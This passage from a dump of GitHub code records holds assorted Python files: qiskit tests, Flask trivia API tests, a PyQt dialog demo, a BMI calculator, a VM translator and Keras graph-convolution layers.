Lab02.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22186515423","text":"import sys\r\n# set default encoding to windows locale in order to handle unicode path names\r\n# correctly. This is done here for built executables\r\n# or in Lib\\site.py when running from sources\r\n\r\nif sys.platform == 'win32':\r\n import locale, codecs\r\n enc = locale.getdefaultlocale()[1]\r\n if enc.startswith('cp'): # \"cp***\" ?\r\n try:\r\n codecs.lookup(enc)\r\n except LookupError:\r\n import encodings\r\n encodings._cache[enc] = encodings._unknown\r\n encodings.aliases.aliases[enc] = 'mbcs'\r\n\r\n if hasattr(sys, 'setdefaultencoding'):\r\n try:\r\n sys.setdefaultencoding(enc)\r\n except LookupError:\r\n sys.setdefaultencoding('ascii')\r\n del sys.setdefaultencoding\r\n","repo_name":"clamwin/clamwin","sub_path":"py/SetUnicode.py","file_name":"SetUnicode.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"31"} +{"seq_id":"32863364835","text":"import numpy as np\n\nfrom test.common import QiskitAquaTestCase\nfrom qiskit.aqua import get_aer_backend\n\nfrom qiskit.aqua import run_algorithm\nfrom qiskit.aqua.input import EnergyInput\nfrom qiskit.aqua.translators.ising import clique\nfrom qiskit.aqua.algorithms import ExactEigensolver\n\n\nclass TestClique(QiskitAquaTestCase):\n \"\"\"Cplex Ising tests.\"\"\"\n\n def setUp(self):\n super().setUp()\n self.K = 5 # K means the size of the clique\n np.random.seed(100)\n self.num_nodes = 5\n self.w = clique.random_graph(self.num_nodes, edge_prob=0.8, weight_range=10)\n self.qubit_op, self.offset = clique.get_clique_qubitops(self.w, self.K)\n self.algo_input = EnergyInput(self.qubit_op)\n\n def brute_force(self):\n # brute-force way: try every possible assignment!\n def bitfield(n, L):\n result = np.binary_repr(n, L)\n return [int(digit) for digit in result]\n\n L = self.num_nodes # length of the bitstring that represents the assignment\n max = 2**L\n has_sol = False\n for i in range(max):\n cur = bitfield(i, L)\n cur_v = clique.satisfy_or_not(np.array(cur), self.w, self.K)\n if cur_v:\n has_sol = True\n break\n return has_sol\n\n def test_clique(self):\n params = {\n 'problem': 
{'name': 'ising'},\n 'algorithm': {'name': 'ExactEigensolver'}\n }\n result = run_algorithm(params, self.algo_input)\n x = clique.sample_most_likely(len(self.w), result['eigvecs'][0])\n ising_sol = clique.get_graph_solution(x)\n np.testing.assert_array_equal(ising_sol, [1, 1, 1, 1, 1])\n oracle = self.brute_force()\n self.assertEqual(clique.satisfy_or_not(ising_sol, self.w, self.K), oracle)\n\n def test_clique_direct(self):\n algo = ExactEigensolver(self.algo_input.qubit_op, k=1, aux_operators=[])\n result = algo.run()\n x = clique.sample_most_likely(len(self.w), result['eigvecs'][0])\n ising_sol = clique.get_graph_solution(x)\n np.testing.assert_array_equal(ising_sol, [1, 1, 1, 1, 1])\n oracle = self.brute_force()\n self.assertEqual(clique.satisfy_or_not(ising_sol, self.w, self.K), oracle)\n\n def test_clique_vqe(self):\n algorithm_cfg = {\n 'name': 'VQE',\n 'operator_mode': 'matrix',\n 'batch_mode': True\n }\n\n optimizer_cfg = {\n 'name': 'COBYLA'\n }\n\n var_form_cfg = {\n 'name': 'RY',\n 'depth': 5,\n 'entanglement': 'linear'\n }\n\n params = {\n 'problem': {'name': 'ising', 'random_seed': 10598},\n 'algorithm': algorithm_cfg,\n 'optimizer': optimizer_cfg,\n 'variational_form': var_form_cfg\n }\n backend = get_aer_backend('statevector_simulator')\n result = run_algorithm(params, self.algo_input, backend=backend)\n x = clique.sample_most_likely(len(self.w), result['eigvecs'][0])\n ising_sol = clique.get_graph_solution(x)\n np.testing.assert_array_equal(ising_sol, [1, 1, 1, 1, 1])\n oracle = self.brute_force()\n self.assertEqual(clique.satisfy_or_not(ising_sol, self.w, self.K), oracle)\n","repo_name":"epiqc/PartialCompilation","sub_path":"qiskit-aqua/test/test_clique.py","file_name":"test_clique.py","file_ext":"py","file_size_in_byte":3275,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"23146928902","text":"import os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\n\nfrom flaskr import create_app\nfrom models import setup_db, Question, Category\n\n\nclass TriviaTestCase(unittest.TestCase):\n \"\"\"This class represents the trivia test case\"\"\"\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia_test\"\n self.database_user = \"postgres\"\n self.database_password = \"Passasdk\"\n self.database_host = \"localhost\"\n self.database_port = \"5432\"\n self.database_path = f'postgresql://{self.database_user}:{self.database_password}@{self.database_host}:{self.database_port}/{self.database_name}'\n setup_db(self.app, self.database_path)\n\n self.new_question = {\n \"question\": 'Which planet has a moon named The Moon?',\n \"answer\": \"Earth\",\n \"difficulty\": 3,\n \"category\": 1\n }\n\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n \n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n \"\"\"\n DONE\n Write at least one test for each test for successful \n operation and for expected errors.\n \"\"\"\n #... 
Test for catrgory\n def test_retrive_categories(self):\n res = self.client().get('/categories')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n\n\n def test_questions_by_category(self):\n res = self.client().get('/categories/1/questions')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n\n\n def test_404_sent_request_beyond_valid_category(self):\n res = self.client().get('/categories/1000/questions')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Unprocessable')\n\n\n def test_retrieve_categories_faliur(self):\n res = self.client().post('/categories', json={'astronmy': 'xyz'})\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 405)\n self.assertFalse(data['success'])\n self.assertEqual(data['message'], 'Method not allowed')\n\n\n #... Test for questions paginations\n def test_retrive_questions(self):\n res = self.client().get('/questions')\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(len(data['questions']), 10)\n #... the rest for the page\n\n\n def test_404_sent_request_beyond_valid_page(self):\n res = self.client().get('/questions?page=500', json={'category': str(2)})\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Resource is not found') \n\n\n def test_422_sent_request_page_0(self):\n res = self.client().get('/questions?page=0', json={'category': str(2)})\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Resource is not found') \n\n\n #... Test for deletion\n def test_delete_question(self):\n question = Question.query.order_by(Question.id.desc()).first()\n question_id = question.id\n\n res = self.client().delete('/questions/{}'.format(question_id))\n data = json.loads(res.data)\n question_state = Question.query.filter(Question.id == question_id).one_or_none()\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['deleted'], f'question id = {question_id} deleted')\n self.assertEqual(question_state, None)\n\n\n def test_delete_question_failure(self):\n question_id = -1\n res = self.client().delete('/questions/{}'.format(question_id))\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 404)\n self.assertFalse(data['success'])\n self.assertEqual(data['message'], 'Resource is not found')\n\n\n #... Test for creation\n def test_create_question(self):\n res = self.client().post('/questions', json=self.new_question)\n data = json.loads(res.data)\n new_question = Question.query.order_by(Question.id.desc()).first()\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['created'], new_question.id)\n\n\n def test_create_question_failure(self):\n #... with missing piece of info\n new_question = {\n \"question\": 4,\n \"difficulty\": 'xyz',\n \"category\": '1'\n }\n res = self.client().post('/questions', json=new_question)\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 422)\n self.assertFalse(data['success'])\n self.assertEqual(data['message'], 'Unprocessable')\n\n\n #... 
Test for searching \n def test_search_questions(self):\n res = self.client().post('/questions/search', json={\"searchTerm\": 'title'})\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['current_questions'])\n\n\n def test_search_questions_success_no_results(self):\n response = self.client().post('/questions/search', json={\"searchTerm\": 'xxxxxxx'})\n data = json.loads(response.data)\n\n self.assertEqual(response.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'Resource is not found')\n\n\n\n #... Test for quizz\n def test_quizzes_failure(self):\n category = Category.query.first()\n res = self.client().post('/quizzes', json={'quiz_category': category.format()})\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 422)\n self.assertFalse(data['success'])\n self.assertEqual(data['message'], 'Unprocessable')\n\n\n def test_quizzes_success(self):\n category = \"History\"\n\n res = self.client().post('/quizzes', json={'quiz_category': {'type': 'History', 'id': '4'},\n 'previous_questions': [9, 12]})\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['question']) \n\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"A-Mido/Trivia_APP","sub_path":"backend/test_flaskr.py","file_name":"test_flaskr.py","file_ext":"py","file_size_in_byte":6904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18292318091","text":"import open3d as o3d\nimport copy\nimport numpy as np\npc = o3d.io.read_point_cloud('/data/endoscope/simulation_data/contour.ply')\nprojected_pc = o3d.io.read_point_cloud('/data/endoscope/simulation_data/label_contour_reprojected.ply')\n\npseudo_3d = False\n\nif pseudo_3d:\n z_points = np.asarray(copy.deepcopy(pc.points))\n z_points.std(axis=0)\n z_points[:,-1] = np.random.normal(loc=0.1,scale=0.001,size=z_points.shape[0])\n new_pc = o3d.geometry.PointCloud()\n new_pc.points = o3d.open3d.utility.Vector3dVector(z_points)\nelse:\n new_pc = copy.deepcopy(pc)\n\ndef cloud2image(extrinsics,intrinsics,point_cloud_path=\"/data/endoscope/simulation_data/contour.ply\"):\n pc = o3d.io.read_point_cloud(point_cloud_path)\n points = np.asarray(pc.points)\n points = np.c_[points,np.ones(points.shape[0])]\n new_points = np.linalg.inv(extrinsics) @ points.T\n new_points = new_points[:3,:]\n new_points /= new_points[:,-1]\n return new_points\n projected_new_points = intrinsics @ new_points\n return projected_new_points\n\n# R = new_pc.get_rotation_matrix_from_xyz((0,0,np.pi/18))\n# new_pc.rotate(R)\n# print(R)\n# new_pc.translate((0.0002, 0.001, 0.5))\n\n# pc_r.scale(1.1)\n# o3d.io.write_point_cloud('/home/SENSETIME/xulixin2/code/multimodal-registration-master/new_gradient-hystheresis-image.ply',new_pc,write_ascii=True)\no3d.visualization.draw_geometries([pc])\n\n\n\n","repo_name":"blacksino/virtual_camera","sub_path":"point_clound.py","file_name":"point_clound.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9818417196","text":"num1 = 0\nnum2 = 0\nans = 0\n\nchoice = input(\"What would you like to do - enter numbers/read file:\\n\").lower()\nprint(choice)\nif choice == \"enter number\":\n\ttry:\n\t\twith open('equations.txt','a') as 
f:\n\t\t\tprint(\"in\")\n\t\n\texcept Exception:\n\t\tprint(\"Error, file does not exist.\")\n","repo_name":"Ejay14/Python","sub_path":"tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4117497589","text":"'''\no programa anterior, deve informar ao final o aluno com maior e menor imc.\n'''\nnome=[]\nPesoA=[]\nAlturaA=[]\nimcA=[]\nmediaP= 0\nmediaA= 0\nmediaIMC=0\nmaiorimc=0\nmaiorimcnome=\"a\"\nmenorimc=0\nmenorimcnome=\"a\"\nquant=int(input(\"Informe a quantidade de alunos da turma: \"))\n #Enntrada de Dados e Calculo IMC\nfor i in range(quant):\n nome.append(input(\"Digite o nome do aluno: \"))\n PesoA.append(float(input(\"Digite o peso: \")))\n AlturaA.append(float(input(\"Digite a altura: \")))\n imcA.append(PesoA[i]/(AlturaA[i]**2))\n #Calculo das medias e procura do maior e menor IMC\nmenorimc=imcA[0]\nfor i in range(quant):\n mediaP=mediaP+PesoA[i]\n mediaA=mediaA+AlturaA[i]\n mediaIMC=mediaIMC+imcA[i]\n if (imcA[i] > maiorimc):\n maiorimc=imcA[i]\n maiorimcnome=nome[i]\n if (imcA[i] < menorimc):\n menorimc=imcA[i]\n menorimcnome=nome[i]\nmediaP=mediaP/quant\nmediaA=mediaA/quant\nmediaIMC=mediaIMC/quant\n #Saida\nprint(\"A média dos Pesos é : %f\"%mediaP)\nprint(\"A média das Alturas é: %f\"%mediaA)\nprint(\"A média dos IMC's é: %f\"%mediaIMC)\nprint(\"O Aluno %s é o dono do maior IMC, que é: %d\"%(maiorimcnome,maiorimc))\nprint(\"O Aluno %s é o dono do maior IMC, que é: %d\"%(menorimcnome,menorimc))\n","repo_name":"mmichaelfelipe/Python-Algoritmos","sub_path":"04 Aula 05 04/8_ IMC.py","file_name":"8_ IMC.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73488170968","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 29 15:01:57 2022\r\n\r\n@author: thijs\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport random\r\n\r\ndef random_spawns(agents): \r\n x = []\r\n y = []\r\n z = []\r\n \r\n #map dimensions\r\n c = 11\r\n d = 24\r\n \r\n #open file containing map\r\n with open('C:/Users/thijs/OneDrive/Bureaublad/Bio_Based/instance2.txt') as f:\r\n [x.append(line) for line in f.readlines()]\r\n\r\n f.close()\r\n #find allowable starting locations in first two columns and last two rows of map\r\n for i in np.arange(1, c-1, 1):\r\n for j in np.arange(1,3):\r\n y.append([i, j])\r\n for i in np.arange(1, c-1, 1):\r\n for j in np.arange(d - 3, d-1, 1):\r\n z.append([i, j])\r\n #open file to wirte random start and goal locs in\r\n with open('C:/Users/thijs/OneDrive/Bureaublad/Bio_Based/Assignment.txt', 'w') as f:\r\n for i in range(len(x)):\r\n f.write(x[i])\r\n f.write('\\n')\r\n f.write(str(agents))\r\n for ii in range(agents):\r\n a = random.randint(1, len(y)-1)\r\n b = random.randint(1, len(z)-1)\r\n #randomly select a start and goal loc from the allowable locations\r\n start_loc = y[a-1]\r\n goal_loc = z[b-1]\r\n y.remove(y[a-1])\r\n z.remove(z[b-1])\r\n \r\n #write start and goal locs into assignment file\r\n txt = str(start_loc[0])\r\n txt1 = str(start_loc[1])\r\n txt2 = str(goal_loc[0])\r\n txt3 = str(goal_loc[1])\r\n f.write('\\n')\r\n f.write(txt)\r\n f.write(' ')\r\n f.write(txt1)\r\n f.write(' ')\r\n f.write(txt2)\r\n f.write(' ')\r\n 
f.write(txt3)","repo_name":"ThijsBe/Bio_Based_AE4350","sub_path":"Randomized_spawns.py","file_name":"Randomized_spawns.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6348311904","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 28 18:18:11 2021\n\n@author: dogancan Torun\n\"\"\"\n\n\n#Diyalog pencereleri iki şekilde olur #Arka tarafla etkileşemeyen,modal ,etkileşemeyen modless olarak adlandırılır \n#Bir Gui üzerinde modal ve modless tasarımı yapacağım \n#Ana menü üzerinde her iki modeli inşa edeceğim \n#Qdialogdan sınıf türetip o sınıftan nesne yaratıp exec ile bunu çağırmalıyız. \nimport sys\n\nfrom PyQt5.Qt import *\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n self.resize(640, 480)\n self.setFont(QFont('Arial', 12))\n\n dialogPopup = QMenu('Dialog', self)\n self.modalAction = dialogPopup.addAction('Modal...')\n self.modalAction.setFont(QFont('Arial', 12))\n self.modalAction.setShortcut('Ctrl+D')\n self.modalAction.triggered.connect(self.modalActionHandler)\n self.menuBar().addMenu(dialogPopup)\n\n def modalActionHandler(self):\n mmd = MyModalDialog(self)\n if mmd.exec() == QDialog.Accepted:\n name = mmd.lineEditName.text()\n no = mmd.lineEditNo.text()\n\n QMessageBox.information(self, 'Info', name + '\\n' + no)\n\nclass MyModalDialog(QDialog):\n def __init__(self, parent):\n super().__init__(parent)\n self.resize(370, 120)\n\n self.labelName = QLabel('Adı Soyadı:', self)\n self.labelName.move(10, 10)\n self.labelName.move(10, 10)\n\n self.lineEditName = QLineEdit(self)\n self.lineEditName.move(100, 10)\n\n self.labelNo = QLabel('No:', self)\n self.labelNo.move(10, 40)\n\n self.lineEditNo = QLineEdit(self)\n self.lineEditNo.move(100, 40)\n\n self.pushButtonOk = QPushButton('Ok', self)\n self.pushButtonOk.clicked.connect(self.pushButtonOkHandler)\n self.pushButtonOk.setGeometry(150, 80, 70, 25)\n\n self.pushButtonCancel = QPushButton('Cancel', self)\n self.pushButtonCancel.clicked.connect(self.pushButtonCancelHandler)\n self.pushButtonCancel.setGeometry(230, 80, 70, 25)\n\n def pushButtonOkHandler(self):\n self.done(QDialog.Accepted)\n\n def pushButtonCancelHandler(self):\n self.done(QDialog.Rejected)\n\napp = QApplication(sys.argv)\nmainWindow = MainWindow()\nmainWindow.show()\napp.exec()","repo_name":"dogancantorun8/python-application","sub_path":"PYQT/pyqt26_diyalog_pencereleri_giris.py","file_name":"pyqt26_diyalog_pencereleri_giris.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32864747495","text":"import unittest\nimport qiskit\nimport qiskit.extensions.simulator\nfrom qiskit.quantum_info import state_fidelity\nfrom qiskit import execute\nfrom qiskit.test import QiskitTestCase, requires_aer_provider\n\n\n@requires_aer_provider\nclass TestCrossSimulation(QiskitTestCase):\n \"\"\"Test output consistency across simulators (from built-in and legacy simulators & IBMQ)\n \"\"\"\n _desired_fidelity = 0.99\n\n def test_statevector(self):\n \"\"\"statevector from a bell state\"\"\"\n qr = qiskit.QuantumRegister(2)\n circuit = qiskit.QuantumCircuit(qr)\n circuit.h(qr[0])\n circuit.cx(qr[0], qr[1])\n\n sim_cpp = qiskit.providers.aer.StatevectorSimulator()\n sim_py = qiskit.providers.builtinsimulators.StatevectorSimulatorPy()\n result_cpp = execute(circuit, sim_cpp).result()\n result_py = execute(circuit, sim_py).result()\n statevector_cpp 
= result_cpp.get_statevector()\n statevector_py = result_py.get_statevector()\n fidelity = state_fidelity(statevector_cpp, statevector_py)\n self.assertGreater(\n fidelity, self._desired_fidelity,\n \"cpp vs. py statevector has low fidelity{0:.2g}.\".format(fidelity))\n\n def test_qasm(self):\n \"\"\"counts from a GHZ state\"\"\"\n qr = qiskit.QuantumRegister(3)\n cr = qiskit.ClassicalRegister(3)\n circuit = qiskit.QuantumCircuit(qr, cr)\n circuit.h(qr[0])\n circuit.cx(qr[0], qr[1])\n circuit.cx(qr[1], qr[2])\n circuit.measure(qr, cr)\n\n sim_cpp = qiskit.providers.aer.QasmSimulator()\n sim_py = qiskit.providers.builtinsimulators.QasmSimulatorPy()\n shots = 2000\n result_cpp = execute(circuit, sim_cpp, shots=shots).result()\n result_py = execute(circuit, sim_py, shots=shots).result()\n counts_cpp = result_cpp.get_counts()\n counts_py = result_py.get_counts()\n self.assertDictAlmostEqual(counts_cpp, counts_py, shots*0.08)\n\n def test_qasm_reset_measure(self):\n \"\"\"counts from a qasm program with measure and reset in the middle\"\"\"\n qr = qiskit.QuantumRegister(3)\n cr = qiskit.ClassicalRegister(3)\n circuit = qiskit.QuantumCircuit(qr, cr)\n circuit.h(qr[0])\n circuit.cx(qr[0], qr[1])\n circuit.reset(qr[0])\n circuit.cx(qr[1], qr[2])\n circuit.t(qr)\n circuit.measure(qr[1], cr[1])\n circuit.h(qr[2])\n circuit.measure(qr[2], cr[2])\n\n sim_cpp = qiskit.providers.aer.QasmSimulator()\n sim_py = qiskit.providers.builtinsimulators.QasmSimulatorPy()\n shots = 1000\n result_cpp = execute(circuit, sim_cpp, shots=shots, seed=1).result()\n result_py = execute(circuit, sim_py, shots=shots, seed=1).result()\n counts_cpp = result_cpp.get_counts()\n counts_py = result_py.get_counts()\n self.assertDictAlmostEqual(counts_cpp, counts_py, shots * 0.06)\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"epiqc/PartialCompilation","sub_path":"qiskit-terra/test/python/aer_provider_integration_test/test_simulator_interfaces.py","file_name":"test_simulator_interfaces.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"31"} +{"seq_id":"37023713368","text":"# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, val=0, next=None):\r\n# self.val = val\r\n# self.next = next\r\nclass Solution:\r\n def middleNode(self, head: Optional[ListNode]) -> Optional[ListNode]:\r\n n = 0\r\n c = 0\r\n current = head\r\n while current:\r\n current = current.next\r\n n += 1\r\n \r\n current = head\r\n for i in range(n//2):\r\n current = current.next\r\n return current\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"arafimam/Data-Structure-and-Algorithm-Revision","sub_path":"Python_Solutions_alyosha/Middle of linked list.py","file_name":"Middle of linked list.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"39667945792","text":"import Parser\r\nimport CodeWriter as cw\r\nfrom sys import argv\r\n\r\nwindow_path = 'D:\\_wanghui\\\\workspace\\nand2tetris\\\\projects\\\\08\\\\FunctionCalls\\\\NestedCall\\Sys.vm'\r\n\r\nDEBUG = 0\r\n\r\nif DEBUG == 1:\r\n\tf = open('ProgramFlow/FibonacciSeries/FibonacciSeries.vm')\r\nelif DEBUG == 2:\r\n\tf = open(window_path[window_path[:window_path[:window_path.rfind('\\\\')].rfind('\\\\')].rfind('\\\\')+1:].replace('\\\\','/'))\r\nelse:\r\n\tf = open(argv[1])\r\n\r\ntemp_vm_content = ''\r\noutput = ''\r\n\r\nlines = f.readlines()\r\n\r\n\r\nfor 
(idx,l) in enumerate(lines):\r\n\tcleaned_cmd = Parser.clean(l)\r\n\t\r\n\tif DEBUG:\r\n\t\tprint('//' + Parser.clean(l), end = '')\r\n\r\n\tcmd_type = Parser.cmdType(cleaned_cmd)\r\n\tif cmd_type == Parser.C_ARITHMETIC:\r\n\t\tc = cw.arithmetric_translate(cleaned_cmd)\r\n\t\toutput = output + c\r\n\r\n\t\tif DEBUG:\r\n\t\t\tprint('- cmd type: C_ARITHMETIC')\r\n\t\t\tprint(c)\r\n\r\n\tif cmd_type == Parser.C_PUSH:\r\n\t\targ1 = Parser.arg1(cleaned_cmd)\r\n\t\targ2 = Parser.arg2(cleaned_cmd)\r\n\t\tif arg1 == 'static':\r\n\t\t\targ1 = argv[1] + arg1\r\n\t\tc = cw.push_translate(arg1, arg2)\r\n\t\toutput = output + c\r\n\r\n\t\tif DEBUG:\r\n\t\t\tprint('- arg1 ' + arg1, end = '')\r\n\t\t\tprint('- arg2 ' + str(arg2), end = '')\r\n\t\t\tprint('- cmd type: C_PUSH')\r\n\t\t\tprint(c)\r\n\tif cmd_type == Parser.C_POP:\r\n\t\targ1 = Parser.arg1(cleaned_cmd)\r\n\t\targ2 = Parser.arg2(cleaned_cmd)\r\n\t\tif arg1 == 'static':\r\n\t\t\targ1 = argv[1] + arg1\r\n\t\tc = cw.pop_translate(arg1, arg2)\r\n\t\toutput = output + c\r\n\r\n\t\tif DEBUG:\r\n\t\t\tprint('- arg1 ' + arg1, end = '')\r\n\t\t\tprint('- arg2 ' + str(arg2), end = '')\r\n\t\t\tprint('- cmd type: C_POP')\r\n\t\t\tprint(c)\r\n\tif cmd_type == Parser.C_LABEL:\r\n\t\tc = cw.label_translate(cleaned_cmd)\r\n\t\toutput = output + c\r\n\r\n\t\tif DEBUG:\r\n\t\t\tprint('- cmd type: C_LABEL')\r\n\t\t\tprint(c)\r\n\tif cmd_type == Parser.C_GOTO:\r\n\t\tc = cw.goto_translate(cleaned_cmd)\r\n\t\toutput = output + c\r\n\t\tif DEBUG:\r\n\t\t\tprint('- cmd type: C_GOTO')\r\n\t\t\tprint(c)\r\n\tif cmd_type == Parser.C_IF:\r\n\t\tc = cw.if_goto_translate(cleaned_cmd)\r\n\t\toutput = output + c\r\n\t\tif DEBUG:\r\n\t\t\tprint('- cmd type: C_IF')\r\n\t\t\tprint(c)\r\n\tif cmd_type == Parser.C_FUNCTION:\r\n\t\tc = cw.func_translate(cleaned_cmd)\r\n\t\toutput = output + c\r\n\t\tif DEBUG:\r\n\t\t\tprint('- cmd type: C_FUNCTION')\r\n\t\t\tprint(c)\r\n\r\n\tif cmd_type == Parser.C_RETURN:\r\n\t\tc = cw.return_translate(cleaned_cmd)\r\n\t\toutput = output + c\r\n\t\tif DEBUG:\r\n\t\t\tprint('- cmd type: C_RETURN')\r\n\t\t\tprint(c)\t\t\r\n\tif cmd_type == Parser.C_CALL:\r\n\t\tc = cw.call_translate(cleaned_cmd, argv[1] , idx)\r\n\t\toutput = output + c\r\n\t\tif DEBUG:\r\n\t\t\tprint('- cmd type: C_CALL')\r\n\t\t\tprint(c)\t\t\r\n\r\noutput = output + '(END)\\n@END\\n0;JMP\\n'\r\nif DEBUG:\r\n\tprint(output)\r\nelse:\r\n\tof = open(argv[1].replace('.vm','.asm'), 'w+')\r\n\tof.write(output)\r\n\tof.close()","repo_name":"xiaowan-tiger/nands2tetris","sub_path":"projects/08/VMTranslator_debug.py","file_name":"VMTranslator_debug.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35551995712","text":"# these codes are from \nimport numpy as np\nimport scipy.sparse as sp\nimport tensorflow as tf\nfrom keras import backend as K\nfrom keras import activations, initializers, regularizers, constraints\nfrom keras.layers import Layer, LeakyReLU, Dropout, AveragePooling2D, AveragePooling1D\n\ndef filter_dot(fltr, features):\n    if len(K.int_shape(features)) == 2:\n        # Single mode\n        return K.dot(fltr, features)\n    else:\n        return K.batch_dot(fltr, features)\n\n\nclass GraphConv(Layer):\n    def __init__(self,\n                 channels,\n                 activation=None,\n                 use_bias=True,\n                 kernel_initializer='glorot_uniform',\n                 bias_initializer='zeros',\n                 kernel_regularizer=None,\n                 bias_regularizer=None,\n                 activity_regularizer=None,\n                 kernel_constraint=None,\n                 bias_constraint=None,\n                 **kwargs):\n        if 
'input_shape' not in kwargs and 'input_dim' in kwargs:\n            kwargs['input_shape'] = (kwargs.pop('input_dim'),)\n        super().__init__(**kwargs)\n        self.channels = channels\n        self.activation = activations.get(activation)\n        self.use_bias = use_bias\n        self.kernel_initializer = initializers.get(kernel_initializer)\n        self.bias_initializer = initializers.get(bias_initializer)\n        self.kernel_regularizer = regularizers.get(kernel_regularizer)\n        self.bias_regularizer = regularizers.get(bias_regularizer)\n        self.activity_regularizer = regularizers.get(activity_regularizer)\n        self.kernel_constraint = constraints.get(kernel_constraint)\n        self.bias_constraint = constraints.get(bias_constraint)\n        self.supports_masking = False\n\n    def build(self, input_shape):\n        assert len(input_shape) >= 2\n        input_dim = input_shape[0][-1]\n        self.kernel = self.add_weight(shape=(input_dim, self.channels),\n                                      initializer=self.kernel_initializer,\n                                      name='kernel',\n                                      regularizer=self.kernel_regularizer,\n                                      constraint=self.kernel_constraint)\n        if self.use_bias:\n            self.bias = self.add_weight(shape=(self.channels,),\n                                        initializer=self.bias_initializer,\n                                        name='bias',\n                                        regularizer=self.bias_regularizer,\n                                        constraint=self.bias_constraint)\n        else:\n            self.bias = None\n        self.built = True\n\n    def call(self, inputs):\n        features = inputs[0]\n        fltr = inputs[1]\n\n        # Convolution\n        output = K.dot(features, self.kernel)\n        output = filter_dot(fltr, output)\n\n        if self.use_bias:\n            output = K.bias_add(output, self.bias)\n        if self.activation is not None:\n            output = self.activation(output)\n        return output\n\n    def compute_output_shape(self, input_shape):\n        features_shape = input_shape[0]\n        output_shape = features_shape[:-1] + (self.channels,)\n        return output_shape\n\n    def get_config(self):\n        config = {\n            'channels': self.channels,\n            'activation': activations.serialize(self.activation),\n            'use_bias': self.use_bias,\n            'kernel_initializer': initializers.serialize(self.kernel_initializer),\n            'bias_initializer': initializers.serialize(self.bias_initializer),\n            'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),\n            'bias_regularizer': regularizers.serialize(self.bias_regularizer),\n            'activity_regularizer': regularizers.serialize(self.activity_regularizer),\n            'kernel_constraint': constraints.serialize(self.kernel_constraint),\n            'bias_constraint': constraints.serialize(self.bias_constraint)\n        }\n        base_config = super().get_config()\n        return dict(list(base_config.items()) + list(config.items()))\n\nclass GraphAttention2(GraphConv):\n    def __init__(self,\n                 channels,\n                 attn_heads=1,\n                 attn_heads_reduction='average', # {'concat', 'average'}\n                 dropout_rate=0.5,\n                 activation='relu',\n                 use_bias=True,\n                 kernel_initializer='glorot_uniform',\n                 bias_initializer='zeros',\n                 attn_kernel_initializer='glorot_uniform',\n                 kernel_regularizer=None,\n                 bias_regularizer=None,\n                 attn_kernel_regularizer=None,\n                 activity_regularizer=None,\n                 